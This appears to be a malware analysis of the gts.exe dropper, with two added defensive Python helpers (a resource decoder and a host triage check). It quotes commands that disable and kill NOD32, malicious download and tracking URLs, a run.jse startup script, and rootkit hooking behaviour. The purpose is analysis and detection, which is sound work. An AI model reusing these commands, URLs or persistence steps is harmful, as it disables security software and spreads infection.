Gts.exe detailed analysis of the virus
gts.exe:
Executes cmd /c sc config ekrn start= disabled, so the NOD32 service (ekrn) no longer starts
Executes cmd.exe /c taskkill.exe /im ekrn.exe /f to force-terminate the ekrn.exe process
Force-terminates the egui.exe process
At startup, creates a file named te%dt.dll under %Windir%
Extracts resource 129 from its own image, loops over the contents adding 5 to each byte, and writes the result into the DLL just created
Loads the released DLL with rundll32.exe and runs its testall function
Deletes the released DLL file
Creates a randomly named .exe under %Windir%
Extracts resource 101, decodes it, and writes the decoded exe into the file just created
Runs the created exe
Creates the driver file pcidump.sys, writing resource 125 extracted from its own image
Creates the service pcidump bound to pcidump.sys, with start type SERVICE_DEMAND_START, and starts the service immediately
Sends the virus process name to \\.\pcidump so the driver can hide it
Removes the pcidump service
Deletes the released driver file
Copies the virus body to %Windir%\system32
Deletes its own image file
DLL file:
Elevates its privileges
Looks for the Rising CCENTER.EXE process (and also checks for Kaspersky)
If avp.exe is not running, the shell borrows aec.sys; otherwise it borrows AsyncMac.sys. When avp.exe is present a bug appears (it changes the attributes of aec.sys and then deletes AsyncMac.sys)
Removes the file-protection attribute from the driver file aec.sys (the bug is here)
Deletes the driver file AsyncMac.sys
Creates the driver file AsyncMac.sys: reads its own resource 101, decodes it by adding 5 to each byte, writes it to the driver file, then creates a service named AsyncMac bound to drivers\AsyncMac.sys and starts it
Opens \\.\KILLPS_Drv
Searches for the processes of 68 anti-virus products; for each one found, sends control code 2236420 (0x222004) together with the process ID to the driver, then deletes the related services and exe files
Stops the AsyncMac service
Deletes the driver file AsyncMac.sys
Removes the Rising-related services
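The dropper stores resources 129 and 101 with every byte reduced by 5 and restores them by adding 5 to each byte before writing the DLL and the AsyncMac.sys driver. The helper below is an added example for analysts, not code from the original writeup: it applies that transform to a resource blob already carved out of the sample and sanity-checks that the result carries MZ/PE signatures. The stored bytes used here are a constructed fixture, not the real resource.

```python
# Added example (not from the original analysis): undo the "+5 to every byte"
# encoding the writeup describes for gts.exe resources 129 and 101.
# Assumes the analyst has already extracted the raw resource from the sample.

def decode_plus5(blob: bytes, delta: int = 5) -> bytes:
    """Return blob with `delta` added to each byte, wrapping at 256."""
    return bytes((b + delta) & 0xFF for b in blob)


def encode_minus5(blob: bytes, delta: int = 5) -> bytes:
    """Inverse transform; used here only to build the constructed fixture."""
    return bytes((b - delta) & 0xFF for b in blob)


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check on a decoded payload: an MZ header at offset 0 and a
    'PE\\0\\0' signature at the offset stored in e_lfanew (0x3C)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    pe_off = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[pe_off:pe_off + 4] == b"PE\0\0"


# Constructed fixture: a minimal fake executable (only the two signatures are
# meaningful), stored the way the dropper stores it (each byte reduced by 5).
FAKE_PE = bytearray(b"MZ" + b"\0" * 0x3A)        # DOS header up to e_lfanew
FAKE_PE += (0x40).to_bytes(4, "little")           # e_lfanew -> 0x40
FAKE_PE += b"PE\0\0" + b"\0" * 4                  # PE signature at 0x40
FAKE_PE = bytes(FAKE_PE)
STORED_RESOURCE = encode_minus5(FAKE_PE)           # what the resource section holds

if __name__ == "__main__":
    decoded = decode_plus5(STORED_RESOURCE)
    print("stored blob looks like PE:", looks_like_pe(STORED_RESOURCE))  # False
    print("decoded blob looks like PE:", looks_like_pe(decoded))         # True
```

Run it against a real carved resource by replacing STORED_RESOURCE with the file contents; if looks_like_pe() stays False after decoding, the resource is not one of the +5-encoded payloads this writeup describes.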
Randomly named .exe file:
Creates the mutex XETTETT...... to avoid infecting twice
Shuts down the ALG and wscsvc services
Changes the system directory permissions so that Everyone can modify it
Changes the temporary folder permissions so that Everyone can modify it
Adds a value named RsTray under the CurrentVersion\Run registry key with data C:\WINDOWS\system32\scvhost.exe
Creates a thread
In that thread, downloads http://ff.the88888.com:18185/qvod/host.txt, overwrites %Windir%\drivers\etc\hosts with it, and sets the file attribute to read-only
Waits for that thread to finish before creating the next thread
In the next thread, first tests the network status
Then visits http://tj19.x9wdns.com:2787/q2/tj.html?mac=XX:XX:XX&ver=10830&os=XXX&dtime=2010-8-3
Sends data to the remote server
Waits for that thread to finish, then creates another thread that again visits http://tj19.x9wdns.com:2787/q2/tj.html?mac=XX:XX:XX&ver=10830&os=XXX&dtime=2010-8-3
Downloads the file http://ll.best88888.com:88/C/CXX.exe from the remote server and saves it into the system directory as a\smss.exe (the path the startup script below launches)
Creates run.jse in the Startup folder
As follows:
var WSH = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
// launch the dropped smss.exe if it is present
if (fso.FileExists("c:\\windows\\a\\smss.exe"))
{
    WSH.Run("c:\\windows\\a\\smss.exe");
}
Adds run.jse to the startup items
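The persistence and tampering steps above (the RsTray Run value pointing at the svchost look-alike scvhost.exe, run.jse in the Startup folder, the disabled ekrn/wscsvc/ALG services, the pcidump driver service from the gts.exe section, and a read-only hosts file rewritten from a downloaded host.txt) are the artifacts an incident responder would sweep for. The triage routine below is an added example, not code from the original analysis; it takes host state as plain Python data so it runs offline, generalises the hosts check to any name mapped away from loopback, and the SAMPLE_INFECTED and SAMPLE_CLEAN states are constructed.

```python
# Added host-triage example (not code from the original analysis). Indicators
# come from the writeup; the two sample host states below are constructed.
from dataclasses import dataclass

RUN_VALUE_NAME = "RsTray"                       # Run value the dropper adds
RUN_VALUE_DATA = r"C:\WINDOWS\system32\scvhost.exe"
STARTUP_SCRIPT = "run.jse"
DROPPED_DRIVER_SERVICE = "pcidump"
TAMPERED_SERVICES = {"ekrn", "wscsvc", "alg"}   # NOD32 service, Security Center, ALG
LOCAL_ADDRS = {"127.0.0.1", "::1", "0.0.0.0"}   # hosts entries to these are not redirects


@dataclass
class HostState:
    run_values: dict      # ...\CurrentVersion\Run: value name -> data
    startup_files: list   # file names found in the Startup folder
    services: dict        # service name -> (start type, binary path)
    hosts_text: str       # contents of drivers\etc\hosts
    hosts_readonly: bool  # read-only attribute on the hosts file


def hosts_redirects(hosts_text: str) -> list:
    """Return host names mapped to an address other than loopback/unspecified."""
    redirected = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        addr, *names = line.split()
        if addr not in LOCAL_ADDRS:
            redirected.extend(names)
    return redirected


def triage(state: HostState) -> list:
    """Return (severity, description) findings; an empty list means nothing matched."""
    findings = []
    for name, data in state.run_values.items():
        # exact RsTray value is high; any other Run entry naming scvhost.exe is medium
        if name.lower() == RUN_VALUE_NAME.lower() or "scvhost.exe" in data.lower():
            sev = "high" if data.lower() == RUN_VALUE_DATA.lower() else "medium"
            findings.append((sev, f"Run value {name} -> {data}"))
    if any(f.lower() == STARTUP_SCRIPT for f in state.startup_files):
        findings.append(("high", f"{STARTUP_SCRIPT} present in Startup folder"))
    for svc, (start, path) in state.services.items():
        if svc.lower() == DROPPED_DRIVER_SERVICE:
            findings.append(("high", f"driver service {svc} -> {path}"))
        elif svc.lower() in TAMPERED_SERVICES and start.lower() == "disabled":
            findings.append(("medium", f"service {svc} set to disabled"))
    redirected = hosts_redirects(state.hosts_text)
    if redirected:
        findings.append(("medium", f"hosts redirects {len(redirected)} name(s): {', '.join(redirected)}"))
    if state.hosts_readonly:
        findings.append(("low", "hosts file has the read-only attribute set"))
    return findings


# Constructed sample states (not captured from a real machine).
SAMPLE_INFECTED = HostState(
    run_values={"RsTray": r"C:\WINDOWS\system32\scvhost.exe"},
    startup_files=["desktop.ini", "run.jse"],
    services={
        "ekrn": ("disabled", r"C:\Program Files\ESET\ekrn.exe"),
        "wscsvc": ("disabled", r"C:\WINDOWS\system32\svchost.exe -k netsvcs"),
        "pcidump": ("demand", r"C:\WINDOWS\system32\drivers\pcidump.sys"),
    },
    hosts_text="127.0.0.1 localhost\n192.0.2.10 update.example.com  # constructed entry\n",
    hosts_readonly=True,
)
SAMPLE_CLEAN = HostState(
    run_values={"ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe"},
    startup_files=["desktop.ini"],
    services={"ekrn": ("auto", r"C:\Program Files\ESET\ekrn.exe")},
    hosts_text="# default hosts file\n127.0.0.1 localhost\n",
    hosts_readonly=False,
)

if __name__ == "__main__":
    for sev, desc in triage(SAMPLE_INFECTED):
        print(f"[{sev}] {desc}")
```

On a live system the HostState fields would be filled from the Run keys, the Startup folder listing, the service control manager and the hosts file; the scoring is deliberately conservative, since a read-only hosts file or a disabled ALG service alone is only a weak signal, while RsTray, run.jse and a pcidump driver service are each specific to this sample.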
pcidump.sys:
Creates the device \Device\pcidump
Creates the symbolic link \DosDevices\pcidump
FSD hook: hooks the IRP_MJ_CREATE dispatch routine of \FileSystem\FastFat and NTFS to protect the virus process
SSDT hook: hooks ZwQuerySystemInformation to hide the gts.exe process
Performs disk pass-through processing to get past system-restore protection